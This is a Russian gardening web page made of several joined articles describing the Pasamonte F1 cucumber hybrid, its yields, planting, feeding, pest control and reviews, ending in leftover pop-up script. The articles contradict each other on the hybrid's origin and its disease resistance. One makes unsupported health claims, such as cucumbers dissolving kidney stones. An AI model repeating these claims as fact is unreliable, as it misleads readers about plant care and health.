0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Огурцы сорта пасамонте особенности выращивания описание и характеристика фото

Огурец «Пасамонте F1»: высокоурожайный и неприхотливый

Одним из самых популярных овощей в нашей стране является огурец. Остановимся подробнее на одном из любопытных сортов, а именно – на огурце «Пасамонте F1», рассмотрим краткое его описание и приведем отзывы заядлых огородников.

Общие сведения

Огурцы «Пасамонте» относятся к высокоурожайным гибридам. Судя по наблюдениям многих садоводов, срок их созревания достаточно короткий. Селекционировала данный гибрид агротехническая компания «Сингента» (Syngenta Seeds B.V.), расположенная в Голландии. Уже в 1997-м году семена были внесены в государственный реестр двух регионов нашей страны: Центрального и Средневолжского.

Высевать огурцы «Пасамонте F1» можно как в открытом грунте, так и в тепличных условиях (или под тентом, пленкой). В списках рекомендаций значится высадка на приусадебных и садово-огородных участках, а также в небольших фермерских хозяйствах.

Данный сорт семян относится к партенокарпическим, т.е. самоопыляемым. Тип зеленца – корнишонный. Вегетативный период составляет не более 43 дней, после чего можно собирать урожай. Куст растения довольно крепкий, ветвистость развита не сильно, спелость умеренная. Листья куста слабо гофрированные, небольшого (чаще среднего) размера. Окрас зеленый, либо светло-зеленый, без насыщенных тонов. Один листовой пазух способен воспроизвести до трех завязей. Повышенные качества партенокарпии позволяют «Пасамонте» образовывать большее количество завязей.

Плод имеет слабовыраженную ребристость, цилиндрическую форму. На поверхности присутствуют бугорки небольшого размера. Длина зеленца – до 9 см, масса – от 80 до 110 гр. Покрытие плода насыщенного изумрудно-зеленого цвета, присутствуют пятнышки и белые полоски, которые доходят примерно до средней части зеленца. Также на поверхности есть шипы белого цвета. Семена «Пасамонте F1» небольшого размера, даже в сравнении с другими сортами. Вкусовые качества гибрида оцениваются как высокие. Мякоть плотная, не водянистая, хрустящая, обладает приятным освежающим вкусом. Горечь отсутствует во всех случаях, благодаря селекции.

Огурец сорта «Пасамонте F1» имеет высокие показатели урожайности. С одного Га можно собрать до 330 центнеров.

Если выращивать «Пасамонте F1» для реализации, то товарная продукция составит не менее 95%, и это является очень хорошим показателем.

Особенности сорта

Если заглянуть в характеристики этого гибрида, то можно выяснить, что он относится к сортам универсального типа применения. Хотя, если верить отзывам садоводов, «Пасамонте» уступает по вкусовым качествам видам, предназначенным для салатов. Но вкус зеленцов прекрасно раскрывается при консервировании.

Сорт очень восприимчив как к ложной мучнистой росе, так и к бактериозу. Зато у растения нет склонности к перерастанию плодов (рост автоматически замедляется, когда наступает стадия зеленца). Он обладает повышенной резистентностью к основным болезням, присущим данному сорту – пятнистости (бурой), мозаике огуречной.

Огурцы «Пасамонте» выпускаются множеством отечественных агрофирм и распространены по всей центральной части России. Характеристики сорта могут отличаться в зависимости от производителя.

Основные преимущества

Преимуществ у данного гибрида гораздо больше, чем недостатков. Ниже будет приведен список основных достоинств огурцов:

  1. Достаточно высокая устойчивость к нескольким видам болезней.
  2. Партенокарпический сорт, не зависит от насекомых-опылителей.
  3. Ранняя и очень высокая урожайность.
  4. Отсутствие горечи обусловлено генетическим фактором.
  5. Прекрасный плод, обладающий оптимальными пропорциями и ярким вкусом.
  6. Можно выращивать для получения корнишонов.
  7. Универсальное применение: под засол, в салаты, консервация, употребление в свежем виде прямо с грядки.
  8. Еще одна генетическая обусловленность: замедление роста после перехода в стадию зеленца. Когда плод достигает оптимального размера, он практически не меняется до стадии уборки, лишь подпитывается всем необходимым.

Стоит помнить, что резистентность имеется не ко всем болезням, поэтому для их исключения необходимо провести соответствующую обработку.

Существенным недостатком можно назвать только один: неполная устойчивость к болезням. Это приводит к тому, что садоводу необходимо прибегать к дополнительным манипуляциям, проводить соответствующую обработку растения и т.д.

Отзывы

Заключение

Мы рассмотрели огурец раннего поспевания «Пасамонте F1», привели описание и отзывы. Большинство отозвавшихся считают этот сорт оптимальным для выращивания в условиях средней полосы (Центральный и Средневолжский регионы). Высокая урожайность и раннее созревание делают этот гибрид довольно привлекательным как для дачников, так и для небольших агротехнических парков, занимающимся реализацией небольших партий огурцов на продажу.

Неприхотливый сорт без горечи — огурец Пасамонте f1: подробное описание

Когда в разгаре весна, для огородников и фермеров как никогда понадобится высокоурожайный и крепкий гибрид огурцов. Пасамонте f1 всегда продуктивен и стоек, редко болеет и дает значительные урожаи.

Место посадки Сроки созревания Способ применения Длина плода Группа Гладкость плода Способ опыления
Универсальный Раннеспелый (35-45 дней) Универсальный Короткие (корнишоны) — менее 10 см Гибрид Сильнобугристые Партенокарпический

Описание и характеристика сорта

  • среднерослость (высота около 2-2,5 м);
  • средняя плетистость и ветвистость;
  • партенокарпические свойства на высоком уровне.

Растения хорошо облиственны и имеют компактную форму.
Среди признаков зеленцов:

  • длина 6-10 см;
  • масса 60-120 г;
  • форма вытянуто-цилиндрическая;
  • бугорочки крупные;
  • окраска темная, насыщенная;
  • вкус классический без горчинки;
  • мякоть хрустящая, сочная;
  • в сердцевине не возникает пустот.

Зеленцы пользуются спросом, применяются:

  • для свежих блюд;
  • закусок;
  • засаливания;
  • консервирования.

Происхождение и развитие

Пасамонте f1 родом из Шотландии, где появился благодаря усилиям селекционеров из компании «Сингента».

Регион посадки

Гибрид занесен в Госреестр с 1997 г., предназначен для следующих регионов:

Сроки созревания

Пасамонте f1 созревает рано – через 40 суток от появления первых всходов. Он относится к линейке скороспелых сортов. Первые зеленцы длиной 7-8 см можно снять уже через 37 дней. В открытых грядках срок более продолжительный.

Преимущества и недостатки

  • отменная продуктивность;
  • пролонгированное плодоношение;
  • скороспелость;
  • высокие товарные и вкусовые свойства;
  • низкая восприимчивость к инфекциям;
  • привлекательный вид;
  • равномерная изумрудная окраска;
  • долгое хранение до 10-12 суток;
  • универсальность применения;
  • возможность сбора урожая на стадии корнишонов;
  • хорошая транспортировка.

Минусы:

  • возведение опорных конструкций.

Урожайность

Пасамонте f1 нравится земледельцем за стабильную продуктивность. Среди основных показателей урожайности:

  • ранняя 80-133 ц/га;
  • общая 270-330 ц/га;

Товарность приравнивается к 95-98 %.

Посадка

Культуру выращивают через рассаду и прямым севом на участок. Кустики высаживают на расстоянии 30 см. Между рядками оставляют 60-70 см.

Требования к участку:

  • освещенность;
  • рыхлая плодородная земля с нейтральной рH;
  • отсутствие сквозняков.

В неотапливаемые грядки пересаживают рассаду при температуре на улице 20-24 градуса и температуре грунта в пределах 12-14 градусов.

Выращивание и уход

Агротехнику проводят по традиционным правилам:

  1. Внесение удобрений. Подкармливают комплексными составами, минералами, навозом или пометом. На 10 л воды разводят 1 л жидкой органики и 10 г мочевины. Кратность подкормок 2 раза в месяц.
  2. Поливы. До цветения поливают 2-3 раза в неделю, с момента бутонизации 3-5 раз в неделю. Используют теплую воду, норма на 1 куст 4-5 л.
  3. Рыхление и удаление сорных трав проводят еженедельно. Процедура помогает избавиться от мест скопления вредителей и улучшить аэрацию.
  4. Подвязка. Плети фиксируют к сетке или шпалерной конструкции.

Вредители и заболевания

Пасамонте f1 обладает крепким иммунитетом к ВОМ, МР, ЛМР. При распространении инфекции или нарушениях правил ухода возникает риск заражения такими болезнями:

  • гнили серая и белая;
  • антракноз;
  • корневая гниль.

В борьбе с грибками помогают препараты меди и Фундазол.

Корнишон Пасамонте F1 — самоопыляемый и раннеспелый гибрид

Партенокарпический раннеспелый гибридный огурец под необычным названием «Пасамонте F1» рекомендован к культивированию в закрытом и открытом грунте. Обычно выращивается на приусадебных, огородных участках, в небольших фермерских хозяйствах.

Описание сорта

«Пасамонте» – сорт огурцов, не требующий дополнительного опыления (партенокарпический), раннеспелый.После появления первых всходов пройдет около 35 дней до сбора урожая.

Растения среднеплетистые, в каждом узле сформированы минимум 2 завязи. Высокий уровень партенокарпии способствует повышенной завязываемости огурцов. Кусты среднерослые, хорошо облиственные крупными зелёными и светло-зелёными листьями.

Гибрид обладает хорошей болезнеустойчивостью.

Длина огурцов составляет 6-10 сантиметров, а вес – 60-120 грамм. Овощи имеют цилиндрическую форму, соотношение длины к ширине – 3 к 1. Поверхность плодов крупнобугорчатая, кожица тёмно-зелёного цвета. Допускается наличие пятен и доходящих до середины овоща белых полосок. Мякоть огурца хрустящая, плотная, отсутствует горечь и пустоты.

Гибрид отличают отменные вкусовые качества, стабильная урожайность, устойчивость к перерастанию и болезням. Универсальный сорт, употребляемый в свежем виде, а также подходящий для засолки и маринования.

Происхождение и развитие

Гибрид был выведен в шотландской агрофирме под названием «Сингента» (Syngenta Seeds B.V.), являющейся лидером в области семеноводства.

Одно из направлений компании – селекция, производство и последующая продажа семян овощных культур защищённого и открытого грунта.

Регион посадки

В 1997 году сорт был включён в государственный реестр Российской Федерации по Центральному и Средневолжскому региону.

Гибрид рекомендован для выращивания на территории Центрального федерального округа.

Сроки созревания

«Пасамонте» является раннеспелым гибридом. Период от появления первых всходов до начала плодоношения довольно короткий – около 40 дней.

Процесс созревания можно немного ускорить, правильно ухаживая за посаженным растением. Так, большое влияние оказывают климатические условия, влажность воздуха, подкормка.

Урожайность

«Пасамонте» – сорт, дающий стабильные урожаи. За это гибрид полюбился многим огородникам.

Урожайность ранней продукции – 80-133 ц/га (у стандартных сортов 100-118 ц/га). Урожайность товарных плодов составляет 270-330 ц/га . Выход товарной продукции составляет 95-98 процентов (у стандартных сортов – от 78 до 99 процентов).

Посадка и уход

Огурцы «Пасамонте» высаживаются в неотапливаемые теплицы либо в открытый грунт в конце мая либо в начале июня, при ночной температуре не ниже 15 С.

Необходимо регулярно собирать плоды – не реже двух раз в неделю.

Грунт

Для выращивания овощей выбирают хорошо освещённые, прогреваемые солнечными лучами участки с плодородным грунтом. Можно высевать сами семена либо использовать рассадный способ.

Предварительно грунт для посадки вскапывают, вносят навоз и минеральные удобрения.

Посев

Рассада для посадки должна быть 25-35 дневная, иметь несколько листочков. Плотность посева – не более 3-5 кустиков на квадратный метр, глубина посева – полтора-два сантиметра.

При посадке семян их необходимо предварительно замочить на сутки в растворе биогумуса, а также прогреть.

В первое время посаженные огурцы нужно защищать от ночного снижения температуры с помощью плёночного укрытия. Плёнку может заменить любой другой хорошо пропускающий воздух, воду и свет, но защищающий от похолодания нетканый материал.

Рекомендуется выращивать «Пасамонте», используя вертикальное подвязывание.

Полив

Уход за выращиваемым в открытом грунте гибридом включает в себя:

  1. Подкормки. Для подкормок используются минеральные удобрения либо свежий навоз. На ведро воды потребуется 10 г мочевины или литр навоза. Подкормки осуществляются исключительно в вечернее время, 3-4 раза в месяц.
  2. Полив. До цветения растений достаточно осуществлять поливы еженедельно. На стадии плодоношения поливать грядки нужно раз в 2-3 дня, а в жаркий период – ежедневно либо через день. Вода для полива должна быть тёплой.
  3. Прополка и рыхление. Для улучшения аэрационных показателей грунта необходимо ежедневно пропалывать растения, а затем проводить аккуратное рыхление почвы.

Вредители и заболевания

Гибрид имеет высокую степень защиты к кладоспориозу, устойчив к мучнистой росе, вирусу огуречной мозаики, пероноспорозу.

Заболевания, которым подвержен сорт:

  • корневая гниль;
  • антракноз (медянка);
  • серая гниль;
  • склеротония (белая гниль).

Огурцы сорта «Пасамонте» придутся по вкусу следующим вредителям:

  • слизни;
  • белокрылки;
  • галловые нематоды;
  • проволочники;
  • медведки;
  • трипсы.

Сбор и хранение

Крайне важно своевременно собирать урожай. Перерастание снижает качество огурчиков и укорачивает срок плодоношения. Первый урожай можно собрать уже через 35 дней после появления первых всходов. К этому времени огурцы достигают размера 7-9 см. В открытом грунте этот срок может увеличиться.

«Пасамонте» имеет довольно длительный срок хранения – 10 дней без потери качества огурцов. Для тех, кто выращивает овощи на продажу, это свойство очень ценно. Хранить огурчики можно в холодильнике, в воде либо любом сухом прохладном месте.

Преимущества и недостатки сорта

Гибридные огурцы обладают множеством достоинств, благодаря которым они полюбились огородникам:

  • обладают отменными вкусовыми качествами, не горькие;
  • имеют замечательным товарный внешний вид, равномерный зелёный окрас;
  • универсальны: подходят для употребления в свежем виде (в салатах), засолки и маринования;
  • не подвержены многим болезням огурца;
  • стабильная урожайность;
  • не имеют склонности к перерастанию;
  • раннеспелость;
  • самоопыляются, не нужны насекомые;
  • можно выращивать с целью получения корнишонов.

Существенным недостатком гибрида является неполная устойчивость к болезням. При выращивании огурцов садоводу приходится проводить дополнительные манипуляции, тщательно обрабатывать растения.

Сегодня огурцы «Пасамонте» выпускаются в России различными агрофирмами. Внешний вид и характеристики таких плодов отличаются от выпускаемого шотландским предприятием оригинала.

Многие огородники выбирают для посева семена «Пасамонте», дающие стабильный урожай вкуснейших плодов.

Обзор сорта огурцов «Пасамонте»: преимущества и недостатки, особенности агротехники

Партенокарпический огурец Пасамонте f1 – высокоурожайный гибрид голландской селекции. Культура отличается коротким сроком созревания, отменным вкусом и полным отсутствием горечи. В этом материале мы подготовили для вас информацию о методах выращивания гибрида, его отличительных чертах, преимуществах и недостатках.

Описание гибрида

Голландский гибрид Пасамонте f1 выведен селекционерами компании Syngenta seeds и включен в Госреестр России в 1997 году. Допущен к культивации в Центральном и Средневолжском районах в открытом и закрытом грунте.

Растения среднерослые, среднеплетистые. В одном узле образуется 2-3 зеленца. Плоды не склонны к перерастанию.

Гибрид относится к партенокарпикам – растениям с женским типом цветения. Мужские цветки не принимают участия в оплодотворении.

На фото – огурцы Пасамонте.

Отличительные черты

Характеристики гибрида собраны в таблице.

Показатели Характеристика
Срок созревания Раннеспелый, урожай собирают через 40–43 дня с момента всходов
Тип опыления Партенокарпический
Масса 67–120 г
Длина 6–9 см
Форма Цилиндрическая, среднеребристая
Окраска Изумрудно-зеленая с темно-зелеными продольными полосами и средневыраженной пятнистостью
Листья Слабогофрированные, среднего или крупного размера, от светло-зеленого до зеленого цвета
Мякоть Хрустящая, освежающая, не водянистая, практически без семян
Вкус Без горечи
Кожица Тонкая, крупнобугорчатая, с белыми шипами
Назначение Универсальное
Урожайность 269–329 ц/га
Устойчивость К бурой пятнистости, огуречной мозаике
Транспортабельность Высокая

Состав и КБЖУ

Пищевая ценность огурцов (на 100 г):

  • калорийность – 14 ккал;
  • белки – 0,8 г;
  • жиры – 0,1 г;
  • углеводы – 2, 5 г;
  • вода – 95 г;
  • клетчатка – 1 г.

Огурцы – кладезь витаминов и минералов:

  • витамин А;
  • бета-каротин;
  • витамины В1, В2, В4, В5, В6, В9;
  • витамин C;
  • витамин Е;
  • витамин Н;
  • витамин К;
  • витамин РР;
  • калий;
  • кальций;
  • кремний;
  • магний;
  • натрий;
  • сера;
  • фосфор;
  • хлор;
  • железо;
  • йод;
  • марганец;
  • медь;
  • селен;
  • фтор;
  • хром;
  • цинк.

Польза

Благодаря богатому составу, огурцы обладают массой полезных свойств:

  • выводят соли;
  • улучшают метаболизм;
  • выводят свободные радикалы;
  • расширяют сосуды и капилляры;
  • нормализуют артериальное давление;
  • выводят «плохой» холестерин;
  • растворяют песок и камни в почках;
  • стимулируют выработку инсулина;
  • устраняют неприятный запах изо рта;
  • улучшают свойства и состав крови.

Как вырастить гибрид самостоятельно

Огурцы Пасамонте выращивают через рассаду и посев в открытый грунт. Уход за культурой стандартный и предусматривает соблюдение схемы полива и подкормки, рыхления и прополки участка.

Посадка рассадным способом

Рассадный способ выращивания огурцов значительно сокращает время созревания. Даже в открытом грунте урожай начинают собирать на две недели раньше по сравнению с огурцами, выращенными в теплице методом прямого посева.

Гибридные семена в предпосевном обеззараживании и замачивании в стимуляторах роста не нуждаются. Посевной материал проходит обработку на производстве.

Для выращивания сильной и здоровой рассады используют питательную почву: 1 часть опилок, 2 части торфа и перегноя. На ведро 10 л добавляют 2 ст. л. золы и 1,5 ст. л. нитрофоски.

Смесь тщательно перемешивают и распределяют в пластиковые или торфяные емкости доверху. Семена заделывают на глубину 1-2 см, по 1 шт. в каждую тару, и поливают теплой отстоянной водой.

На стадии 2-3 настоящих листочков саженцы подкармливают питательным раствором: 3 ч. л. нитрофоски (нитроаммофоски) на 3 л теплой воды. Поливать рассаду нужно обильно, один раз в семь дней.

Спустя 27–32 дня сеянцы будут готовы к «переселению» на постоянное место.

На участке формируют лунки глубиной 10-15 см, проливают кипятком и высаживают рассаду на расстоянии 50–60 см.

Прямой посев в почву

Огурцы сверхчувствительны к холоду, поэтому для быстрого прорастания почва должна прогреться минимум до +14 °С, а воздух – до +22 °С. Лучшее время для посевных работ – последняя декада мая. Культура предпочитает легкую и питательную почву из смеси дерна, древесных опилок, перегноя и торфа (1:1:1:1).

Участок под посев выбирают с южной стороны. Почву перекапывают перед зимой, удобряют перегноем и поливают раствором медного купороса (1 ч. л. на 3 л воды). Семечки заделывают узкой частью вниз по 2 штуки, на глубину 2-3 см с промежутком 10 см. Далее грунт обильно поливают теплой отстоянной водой.

Участок покрывают полиэтиленом или агроволокном для защиты от ночных заморозков. Семена проклевываются через 6–8 дней.

Важно! При посадке соблюдают главный принцип севооборота – не выращивать огурцы из года в год на одном и том же месте.

Выращивание и уход

Огуречную культуру нежелательно культивировать вблизи посадок томатов, редьки и редиса. Полезные соседи – укроп, фасоль, горох, чеснок, капуста, свекла, лук.

Основные правила успешной агротехники огурцов:

  1. Рыхление грядок после каждого полива и удаление сорных трав. Процедуру проводят аккуратно, стараясь не зацепить корни, расположенные близко к поверхности земли.
  2. Мульчирование почвы опилками или торфом поможет сократить количество прополок.
  3. До начала цветения обеспечивают умеренный полив – 1 раз в 7 дней. В период плодоношения растения поливают под корень ежедневно.
  4. Обрезку плетей проводят в период быстрого роста, формируя растение в один стебель.
  5. Культура отзывчива к регулярным подкормкам. Всего за период вегетации вносят 4-5 порций удобрений.

Схема подкормки огурцов:

  • до цветения – 1 ч. л. мочевины и суперфосфата, 1 ст. л. гумата натрия на 10 л;
  • в период плодоношения – 1 ст. л. нитрофоски, 20 г куриного помета на 10 л воды;
  • последующие подкормки (каждые две недели) – 1 ч. л. сульфата калия, 500 мл коровяка на 10 л воды.

Вместо подкормок, приготовленных самостоятельно, используют готовые гуминовые удобрения «Кормилец», «Идеал», «Плодородие».

Особенности выращивания и возможные трудности

Агротехника огурцов Пасамонте не имеет существенных отличий от культивации других гибридов.

Сильнорослые растения требуют вертикального подвязывания к шпалере.

Огурцы высаживают за кулисными культурами (подсолнухом, кукурузой) для защиты от холодного ветра и палящих солнечных лучей. Высокорослые культуры выступают в роли своеобразной стены, за которой огурцы чувствуют себя уютно, и вступают в плодоношение на несколько дней раньше.

Справка. Кулисные культуры высевают перпендикулярно направлению доминирующих ветров за 6–10 дней до посева или посадки огурцов.

Болезни и вредители

Гибрид имеет иммунитет к бурой пятнистости и огуречной мозаике и абсолютно невосприимчив к бактериозу, мучнистой росе, серой гнили корней.

Обработка растений химическими средствами задерживает плодоношение культуры. В борьбе с грибками и бактериями эффективна профилактика и обработка органическими и минеральными составами.

Признаки мучнистой росы:

  • бело-желтый налет на стеблях и листьях;
  • мелкие коричневые шарики (споры);
  • капельки росы на зелени;
  • сухие листья, скрученные кверху;
  • гниль на огурцах.

Лечение:

  1. Литр простокваши, молочной сыворотки или кефира на 10 л воды. Количество обработок не ограничено.
  2. На литр воды 1/3 ч. л. кальцинированной соды, 25 мл жидкого мыла. Обрабатывать один раз в семь дней.
  3. Литровая банка древесной золы на 5 л кипятка. Настоять 24 часа, опрыскивать кусты с периодичностью один раз в семь дней.

Признаки серой гнили:

  • серо-бурые скользкие пятна на стеблях и листьях;
  • серые, неопределенной формы пятна на плодах;
  • появление водянистого серого пушка на плодах.

Для безопасного лечения используют суспензию «Триходермин». Для полива в 10 л разводят 100 мл препарата. При сильном поражении растения обрабатывают до 5 раз в неделю. Для профилактики серой гнили перед посадкой в грунт корни обмакивают в смесь из 5 л воды, двух частей земли, одной части перегноя, 5 г суспензии. После появления двух листиков рассаду обрабатывают каждые две недели.

Признаки бактериоза:

  • желто-бурые пятна на семядольных листьях характерной угловатой формы;
  • слизь с тыльной стороны листьев;
  • перфорация листьев.

Лечение:

  1. В 1 л кипятка настоять 100 г луковой шелухи. Через 48 часов раствор процедить и разбавить водой в соотношении 1:5. Обрабатывать кусты один раз в 10 дней после захода солнца.
  2. На 10 л воды 1 ч. л. борного спирта и зеленки, опрыскивать растения один раз в 20 дней.

Меры профилактики болезней:

  • периодическая обработка «Трихополом» (2 таблетки на 1 л воды);
  • контроль уровня влаги;
  • соблюдение севооборота;
  • удаление увядших и сухих листьев;
  • снятие 3–5 см грунта и удаление растительных остатков в конце сезона;
  • своевременные подкормки;
  • рыхление грунта;
  • выбор солнечного места для посадки;
  • обработка участка «Гамаиром» перед посевом;
  • уменьшение азота в почве;
  • прореживание посадок.

Особую опасность для огурцов представляет паутинный клещ и слизни. Для профилактики почву перекапывают осенью и оставляют промерзать.

Народные средства против паутинного клеща:

  • прокрутить через мясорубку 1 кг алоэ древовидного, залить 10 л воды и подмешать 50 г стружки хозяйственного мыла;
  • залить 300 г конского щавеля 10 л воды, настоять 3–5 часов;
  • 50 г зелени и цветков одуванчика залить 2 л воды, настоять 3-4 часа.

Периодичность обработки – один раз в две недели.

Народные средства против слизней:

  1. Смешать в равных частях черный молотый перец, древесную золу и каменную соль. Посыпать смесью грядки и разрыхлить.
  2. Вырыть по периметру грядок борозды и насыпать в них золу и табачную пыль в равных частях.
  3. Мульчировать почву измельченной яичной скорлупой, сосновыми иголками, опилками, речным песком. Слизни не любят ползать по таким поверхностям, острые частицы режут брюшко.
  4. Приготовить раствор из 1 л воды и 2 ст. л. нашатыря. Опрыскивать кусты ночью.

Сбор и применение урожая

Плоды гибрида Пасамонте не склонны к перерастанию и останавливаются в росте на стадии полного созревания. Первый урожай собирают через 35–40 дней после всходов.

Благодаря селективной работе биологов в партенокарпических огурцах полностью отсутствует горечь. Плотные и хрустящие зеленцы используют для приготовления свежих салатов, маринования и засолки.

Срок хранения в погребе или холодильнике составляет 10–15 дней.

Преимущества и недостатки

Достоинства гибрида:

  • высокая урожайность;
  • отличный товарный вид;
  • устойчивость к перерастанию;
  • малое количество семян;
  • отсутствие горечи;
  • универсальность использования в кулинарии;
  • ранний срок созревания;
  • подходит для получения корнишонов;
  • партенокарпик не зависит от наличия насекомых-опылителей.

Недостатки:

  • подверженность грибковым и бактериальным заболеваниям;
  • требовательность к поливу.

Отзывы

Гибридный огурец Пасамонте f1 нравится огородникам за высокую продуктивность, отличный вкус и хрустящую мякоть без горчинки.

Валентина, г. Павловск: «Огурцы под названием Пасамонте выращиваю постоянно на своем дачном участке. Культура не требует особого ухода, плодоносит обильно до самых заморозков. Зеленцы небольшого размера, пупырчатые, очень вкусные и хрустящие».

Вера, г. Рамонь: «Ранее к гибридам относилась весьма насторожено и выращивала только отечественные сорта, пока не попробовала огурцы Пасамонте. Семена из Голландии привезла подруга. Посеяла в огороде прямо в грунт. Результат порадовал. Зеленцы – все как на подбор, одинаковые, ровненькие и плотные. Культура требует минимального ухода».

Андрей, г. Павелец: «Выращиваю огурцы в теплице на продажу. Гибрид Пасамонте – один из фаворитов. Производитель рекомендует его для культивации в открытом грунте, но и в теплицах он дает результат не хуже. В плодах отсутствует горечь, нет пустот. Мякоть сочная, но не водянистая. При правильном уходе редко болеет».

Заключение

Партенокарпик Пасамонте f1 – гибридный огурец, не требующий дополнительного опыления. Культура отличается нетребовательностью в уходе, высокой продуктивностью (269–329 ц/га), ранним сроком созревания. Растение нуждается в частом поливе и профилактических обработках против грибка, бактерий и насекомых.

Плоды не склонны к перерастанию и на стадии полной спелости имеют размер не более 9 см. Зеленцы хороши в свежем виде, идеально подходят для консервирования, не горчат.

Высокоурожайные гибридные огурцы «Пасамонте f1» из голландской селекции

Партенокарпический ранний гибридный огурец корнишонного типа под экзотическим названием «Пасамонте f1» от оригинатора Syngenta включен в Государственный реестр РФ и рекомендован для культивирования в открытом грунте на территории ЦФО.

Описание сорта

Кусты среднерослые, хорошо облиственные светло-зелеными и зелеными листьями. Растение среднеплетистое, в каждом узле формируется не менее двух завязей. Гибрид партенокарпический и раннеспелый, поэтому высокая урожайность наступает через 43-45 дней после всходов.

Собранный урожай может быть использован как в свежем виде, так и для консервирования. Гибридная форма обладает достаточной болезнеустойчивостью и устойчива к поражению кладоспориозом. Характеризуется относительной устойчивостью к поражению мучнистой росой и вирусом огуречной мозаики.

Длина зеленцов может составлять 6-9 см, поверхность крупнобугорчатая. Плоды цилиндрической формы, весом от 67 до 120 г. Мякоть очень нежная и вкусная, без пустот и горечи. Общая урожайность в условиях соблюдения агротехники и при благоприятных погодных факторах достигает 12-15 кг на каждый квадратный метр.

Достоинства и недостатки

Раннеспелый партенокарпический гибрид корнишонного типа из голландской селекции с пучковым расположением завязей обладает достаточным количеством достоинств, благодаря которым и пользуется повышенным вниманием у огородников и мелких фермеров:

  • обладает комплексной устойчивостью к основным болезням огурца;
  • гибрид самоопыляемый и не требует наличия насекомых;
  • раннеспелый и очень высокоурожайный;
  • генетически без горечи, с высокими вкусовыми качествами;
  • соотношение длины зеленца к его ширине – 3:1, высокая интенсивность окраски и отличный товарный внешний вид;
  • выращивание с целью получения корнишонов;
  • возможность универсального использования;
  • зеленцы приостанавливают рост при достижении оптимальных размеров на стадии уборочной зрелости.

При культивировании гибридной формы «Пасамонте-f1» следует обязательно учитывать восприимчивость к ложной мучнистой росе.

Огурец «Пасамонте f1»: особенности сорта (видео)

Правила посадки

Под выращивание огурцов отводят участки, которые хорошо освещены и прогреваемы солнечными лучами, а также представлены плодородным грунтом. Дальнейшие правила посадки гибридных огурцов следующие:

  • под зиму грунт необходимо вскопать, с одновременным внесением навоза и основных минеральных удобрений;
  • перед посадкой в открытый грунт семенной материал прогревают и обязательно обрабатывают специальными составами;
  • посев семян огурцов сразу на грядку или посадка предварительно выращенной рассады, но не ранее прогрева грунта и воздуха до оптимальных температур;
  • наилучшее время для посадки огурцов в грунт – это последние числа мая, когда ночные температуры уже не опускаются ниже 15-17 °С;
  • стандартная схема посева и высаживания не более 3-5 растений на каждый квадратный метр или 20х100 см, глубина посева 1,5-2,0 см;
  • во время высаживания рассадные растения должны иметь 3-4 настоящих листочка, то есть возраст огурцов — составлять не менее 2-3 недель.

Рекомендуется на первые дни обеспечить посевы или высаженные растения защитой от похолодания, используя пленочное укрытие и стандартные дуги. Можно заменить пленку нетканым укрывным материалом, который хорошо пропускает свет, воздух и воду, но эффективно защищает растения от низких температур.

Технология выращивания

Гибридный раннеспелый огурец «Пасамонте f1» чаще всего выращивается на грядах в открытом грунте, поэтому уход включает в себя следующие мероприятия:

  • Полив растений. До цветения поливы должны быть умеренными, поэтому вполне достаточно осуществлять оросительные мероприятия один раз в неделю. На фазе активного плодоношения поливы теплой водой производятся ежедневно или через день, в зависимости от температурных показателей и типа грунта.
  • Подкормки. Следует провести при появлении цветения, используя 100 % минеральные удобрения или свежий коровяк. Сорт отзывчив на совмещение три раза в месяц поливов с подкормками на основе литра навоза или 10 г мочевины на ведро теплой воды.
  • Прополка и рыхление. Чтобы улучшить аэрационные показатели грунта, рекомендуется регулярно после прополки проводить осторожное рыхление почвы или мульчирование огуречных гряд.

При выращивании можно использовать как кулисы, так и шпалерный способ. При выращивании шпалерным способом допускается более плотная посадка, но без излишней загущенности растений. Формировать растения рекомендуется в один стебель.

Очень важно проводить своевременную уборку зеленцов, так как их перерастание укорачивает сроки плодоношения и снижает качество плодов.

Отзывы о сорте

Голландские гибридные огурцы давно заслужили доверие отечественных огородников. Сорт очень засухоустойчивый, а отзывы характеризуют его как устойчивый к стерилизации пыльцы при высоких температурных показателях. Гибридная форма универсального назначения обладает тонкой кожурой, очень маленькими семечками и выраженным огуречным вкусом. Урожайность очень хорошая, но, как и для всех гибридов, нужен правильный уход и желателен постоянный полив.

Как посадить огурцы (видео)

Хорошую всхожесть показывает семенной материал от агрофирмы «Плазменные семена», которая уже успела отлично зарекомендовать себя на российском рынке среди отечественных огородников и овощеводов.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
